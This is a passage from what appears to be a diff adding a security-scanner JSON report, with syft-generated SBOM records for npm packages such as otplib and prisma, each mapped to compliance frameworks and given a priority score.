"title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "aa5d016d75962c38", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @otplib/plugin-crypto 12.0.1", + "title": "@otplib/plugin-crypto 12.0.1", + "description": "Package discovered: @otplib/plugin-crypto 12.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f17e31d5db2de66e", + "name": "@otplib/plugin-crypto", + "version": "12.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin-crypto:\\@otplib\\/plugin-crypto:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin-crypto:\\@otplib\\/plugin_crypto:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin_crypto:\\@otplib\\/plugin-crypto:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin_crypto:\\@otplib\\/plugin_crypto:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin:\\@otplib\\/plugin-crypto:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin:\\@otplib\\/plugin_crypto:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40otplib/plugin-crypto@12.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@otplib/plugin-crypto/-/plugin-crypto-12.0.1.tgz", + "integrity": "sha512-qPuhN3QrT7ZZLcLCyKOSNhuijUi9G5guMRVrxq63r9YNOxxQjPm59gVxLM+7xGnHnM6cimY57tuKsjK7y9LM1g==", + "dependencies": { + "@otplib/core": "^12.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "58e5f41c022201bb", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @otplib/plugin-thirty-two 12.0.1", + "title": "@otplib/plugin-thirty-two 12.0.1", + "description": "Package discovered: @otplib/plugin-thirty-two 12.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "104b985242c58dc2", + "name": "@otplib/plugin-thirty-two", + "version": "12.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin-thirty-two:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin-thirty-two:\\@otplib\\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin_thirty_two:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin_thirty_two:\\@otplib\\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin-thirty:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin-thirty:\\@otplib\\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin_thirty:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin_thirty:\\@otplib\\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/plugin:\\@otplib\\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40otplib/plugin-thirty-two@12.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@otplib/plugin-thirty-two/-/plugin-thirty-two-12.0.1.tgz", + "integrity": "sha512-MtT+uqRso909UkbrrYpJ6XFjj9D+x2Py7KjTO9JDPhL0bJUYVu5kFP4TFZW4NFAywrAtFRxOVY261u0qwb93gA==", + "dependencies": { + "@otplib/core": "^12.0.1", + "thirty-two": "^1.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "de3f341e44725439", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @otplib/preset-default 12.0.1", + "title": "@otplib/preset-default 12.0.1", + "description": "Package discovered: @otplib/preset-default 12.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "05997a7e636d9fd8", + "name": "@otplib/preset-default", + "version": "12.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@otplib\\/preset-default:\\@otplib\\/preset-default:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/preset-default:\\@otplib\\/preset_default:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/preset_default:\\@otplib\\/preset-default:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/preset_default:\\@otplib\\/preset_default:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/preset:\\@otplib\\/preset-default:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/preset:\\@otplib\\/preset_default:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40otplib/preset-default@12.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@otplib/preset-default/-/preset-default-12.0.1.tgz", + "integrity": "sha512-xf1v9oOJRyXfluBhMdpOkr+bsE+Irt+0D5uHtvg6x1eosfmHCsCC6ej/m7FXiWqdo0+ZUI6xSKDhJwc8yfiOPQ==", + "dependencies": { + "@otplib/core": "^12.0.1", + "@otplib/plugin-crypto": "^12.0.1", + "@otplib/plugin-thirty-two": "^12.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "61834b2dc1830a08", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @otplib/preset-v11 12.0.1", + "title": "@otplib/preset-v11 12.0.1", + "description": "Package discovered: @otplib/preset-v11 12.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "59bf565b491e939f", + "name": "@otplib/preset-v11", + "version": "12.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@otplib\\/preset-v11:\\@otplib\\/preset-v11:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/preset-v11:\\@otplib\\/preset_v11:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/preset_v11:\\@otplib\\/preset-v11:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/preset_v11:\\@otplib\\/preset_v11:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/preset:\\@otplib\\/preset-v11:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@otplib\\/preset:\\@otplib\\/preset_v11:12.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40otplib/preset-v11@12.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@otplib/preset-v11/-/preset-v11-12.0.1.tgz", + "integrity": "sha512-9hSetMI7ECqbFiKICrNa4w70deTUfArtwXykPUvSHWOdzOlfa9ajglu7mNCntlvxycTiOAXkQGwjQCzzDEMRMg==", + "dependencies": { + "@otplib/core": "^12.0.1", + "@otplib/plugin-crypto": "^12.0.1", + "@otplib/plugin-thirty-two": "^12.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "242a3037b85d7c4e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @pkgjs/parseargs 0.11.0", + "title": "@pkgjs/parseargs 0.11.0", + "description": "Package discovered: @pkgjs/parseargs 0.11.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "060c7b7a8f614664", + "name": "@pkgjs/parseargs", + "version": "0.11.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@pkgjs\\/parseargs:\\@pkgjs\\/parseargs:0.11.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40pkgjs/parseargs@0.11.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", + "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "83a6bc7b54c525e8", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @prisma/client 5.22.0", + "title": "@prisma/client 5.22.0", + "description": "Package discovered: @prisma/client 5.22.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c440900ad881e975", + "name": "@prisma/client", + "version": "5.22.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@prisma\\/client:\\@prisma\\/client:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40prisma/client@5.22.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@prisma/client/-/client-5.22.0.tgz", + "integrity": "sha512-M0SVXfyHnQREBKxCgyo7sffrKttwE6R8PMq330MIUF0pTwjUhLbW84pFDlf06B27XyCR++VtjugEnIHdr07SVA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "888b8378fb32621d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @prisma/debug 5.22.0", + "title": "@prisma/debug 5.22.0", + "description": "Package discovered: @prisma/debug 5.22.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9f4e1fa5bdb80e5a", + "name": "@prisma/debug", + "version": "5.22.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@prisma\\/debug:\\@prisma\\/debug:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40prisma/debug@5.22.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@prisma/debug/-/debug-5.22.0.tgz", + "integrity": "sha512-AUt44v3YJeggO2ZU5BkXI7M4hu9BF2zzH2iF2V5pyXT/lRTyWiElZ7It+bRH1EshoMRxHgpYg4VB6rCM+mG5jQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1e736006ff85bb23", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @prisma/engines 5.22.0", + "title": "@prisma/engines 5.22.0", + "description": "Package discovered: @prisma/engines 5.22.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0f98eed7c2a9484e", + "name": "@prisma/engines", + "version": "5.22.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@prisma\\/engines:\\@prisma\\/engines:5.22.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40prisma/engines@5.22.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@prisma/engines/-/engines-5.22.0.tgz", + "integrity": 